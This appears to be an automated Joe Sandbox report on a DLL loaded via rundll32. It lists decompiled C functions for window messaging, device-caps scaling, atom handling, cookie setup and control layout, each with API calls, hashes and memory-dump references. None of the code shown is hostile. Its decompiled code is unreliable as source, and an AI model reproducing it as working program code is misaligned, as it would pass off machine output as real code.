                                                                                                            0x10022d88
                                                                                                            0x10022d92
                                                                                                            0x10022d95
                                                                                                            0x10022d9f
                                                                                                            0x10022da7

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10022C9E
                                                                                                            • GetTopWindow.USER32(?), ref: 10022CC8
                                                                                                            • GetDlgCtrlID.USER32 ref: 10022CDD
                                                                                                            • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 10022D39
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022D77
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CtrlH_prologMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4125289812-0
                                                                                                            • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                                                            • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}








                                                                                                            0x100316ea
                                                                                                            0x100316f6
                                                                                                            0x10031703
                                                                                                            0x100316f8
                                                                                                            0x100316f8
                                                                                                            0x100316f8
                                                                                                            0x10031710
                                                                                                            0x10031714
                                                                                                            0x10031725
                                                                                                            0x10031753
                                                                                                            0x1003172f
                                                                                                            0x1003172f
                                                                                                            0x1003173f
                                                                                                            0x10031741
                                                                                                            0x10031741
                                                                                                            0x10031725
                                                                                                            0x10031784
                                                                                                            0x10031784
                                                                                                            0x10031786
                                                                                                            0x1003178a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10031771
                                                                                                            0x1003177f
                                                                                                            0x1003177f
                                                                                                            0x10031784
                                                                                                            0x10031784
                                                                                                            0x10031790

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 1003173F
                                                                                                            • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 10031753
                                                                                                            • GetDesktopWindow.USER32 ref: 10031757
                                                                                                            • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 1003177F
                                                                                                            • GetWindow.USER32(00000000), ref: 10031784
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$DesktopLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 2272707703-0
                                                                                                            • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                                                            • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}










                                                                                                            0x10031e78
                                                                                                            0x10031e7e
                                                                                                            0x10031e81
                                                                                                            0x10031e8c
                                                                                                            0x10031e91
                                                                                                            0x10031ea5
                                                                                                            0x10031eab
                                                                                                            0x10031eb1
                                                                                                            0x10031ebc
                                                                                                            0x10031edc
                                                                                                            0x10031eeb
                                                                                                            0x10031f03
                                                                                                            0x10031f0c
                                                                                                            0x10031f33
                                                                                                            0x10031f3a
                                                                                                            0x10031ebc
                                                                                                            0x10031eab
                                                                                                            0x10031f47

                                                                                                            APIs
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031EDC
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031EEB
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031F03
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031F0C
                                                                                                            • SendMessageA.USER32(?,000003E4,?,?), ref: 10031F33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1515195355-0
                                                                                                            • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                                                            • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x10033e16
                                                                                                            0x10033e19
                                                                                                            0x10033e1e
                                                                                                            0x10033e6a
                                                                                                            0x10033e70
                                                                                                            0x00000000
                                                                                                            0x10033e20
                                                                                                            0x10033e29
                                                                                                            0x10033e2e
                                                                                                            0x10033e64
                                                                                                            0x10033e66
                                                                                                            0x10033e75
                                                                                                            0x10033e75
                                                                                                            0x10033e87
                                                                                                            0x10033e8f
                                                                                                            0x10033e95
                                                                                                            0x10033e97
                                                                                                            0x10033e35
                                                                                                            0x10033e37
                                                                                                            0x10033e3b
                                                                                                            0x10033e43
                                                                                                            0x10033e4a
                                                                                                            0x10033e4d
                                                                                                            0x10033e4d
                                                                                                            0x10033e2e
                                                                                                            0x10033e9e

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,742C8B90), ref: 10033E23
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 10033E95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                                                            • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x10033ea4
                                                                                                            0x10033ea7
                                                                                                            0x10033eac
                                                                                                            0x10033ef8
                                                                                                            0x10033efe
                                                                                                            0x00000000
                                                                                                            0x10033eae
                                                                                                            0x10033eb7
                                                                                                            0x10033ebc
                                                                                                            0x10033ef2
                                                                                                            0x10033ef4
                                                                                                            0x10033f03
                                                                                                            0x10033f03
                                                                                                            0x10033f15
                                                                                                            0x10033f1e
                                                                                                            0x10033f20
                                                                                                            0x10033f23
                                                                                                            0x10033f25
                                                                                                            0x10033ec3
                                                                                                            0x10033ec5
                                                                                                            0x10033ec9
                                                                                                            0x10033ed1
                                                                                                            0x10033ed8
                                                                                                            0x10033edb
                                                                                                            0x10033edb
                                                                                                            0x10033ebc
                                                                                                            0x10033f2c

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                                                            • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                                                            • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                                                            • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0x6edecb8c
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}












                                                                                                            0x10016b4a
                                                                                                            0x10016b51
                                                                                                            0x10016b5f
                                                                                                            0x10016b6b
                                                                                                            0x10016b73
                                                                                                            0x10016b7b
                                                                                                            0x10016b87
                                                                                                            0x10016b90
                                                                                                            0x10016b93
                                                                                                            0x10016b95
                                                                                                            0x10016b9b
                                                                                                            0x10016b9d
                                                                                                            0x10016b9d
                                                                                                            0x00000000
                                                                                                            0x10016ba7
                                                                                                            0x10016ba9

                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                                                            • GetTickCount.KERNEL32 ref: 10016B7B
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1445889803-0
                                                                                                            • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                                                            • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}










































                                                                                                            0x1002c1b0
                                                                                                            0x1002c1b2
                                                                                                            0x1002c1b3
                                                                                                            0x1002c1b7
                                                                                                            0x1002c1b8
                                                                                                            0x1002c1bd
                                                                                                            0x1002c1c0
                                                                                                            0x1002c1c3
                                                                                                            0x1002c1cc
                                                                                                            0x1002c1d2
                                                                                                            0x1002c1d5
                                                                                                            0x1002c1e2
                                                                                                            0x1002c1ea
                                                                                                            0x1002c1ed
                                                                                                            0x1002c1f3
                                                                                                            0x1002c1f6
                                                                                                            0x1002c1fc
                                                                                                            0x1002c201
                                                                                                            0x1002c205
                                                                                                            0x1002c206
                                                                                                            0x1002c20a
                                                                                                            0x1002c20d
                                                                                                            0x1002c211
                                                                                                            0x1002c217
                                                                                                            0x1002c21d
                                                                                                            0x1002c225
                                                                                                            0x1002c228
                                                                                                            0x1002c22b
                                                                                                            0x1002c299
                                                                                                            0x1002c299
                                                                                                            0x1002c2a1
                                                                                                            0x1002c2a3
                                                                                                            0x1002c2a3
                                                                                                            0x00000000
                                                                                                            0x1002c22d
